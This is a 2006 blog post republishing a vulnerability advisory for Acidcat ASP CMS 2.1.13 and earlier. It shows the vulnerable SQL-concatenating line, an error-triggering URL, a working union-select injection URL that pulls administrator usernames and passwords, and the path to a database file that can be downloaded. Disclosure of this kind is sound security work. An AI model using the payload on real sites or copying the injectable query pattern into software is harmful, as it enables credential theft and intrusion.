Monday, July 10, 2006

 

Acidcat ASP CMS Multiple Vulnerabilities

Acidcat CMS is a web site and simple content management system that can be administered via a web browser.
It is free for non-commercial use.Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com

Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):admin@hamid.ir.
The original article can be found at: http://hamid.ir/security/

Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16

Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";


Exploit:
The following URL will illustrate how you can easily find administrator username and password by entering the following URL:

http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is :
http://localhost/acidcat/main_login.asp


Database Download:
The database can be downloaded over the web (default installation).it can be found on http://localhost/acidcat/databases/acidcat.mdb

Comments: Post a Comment



<< Home

This page is powered by Blogger. Isn't yours?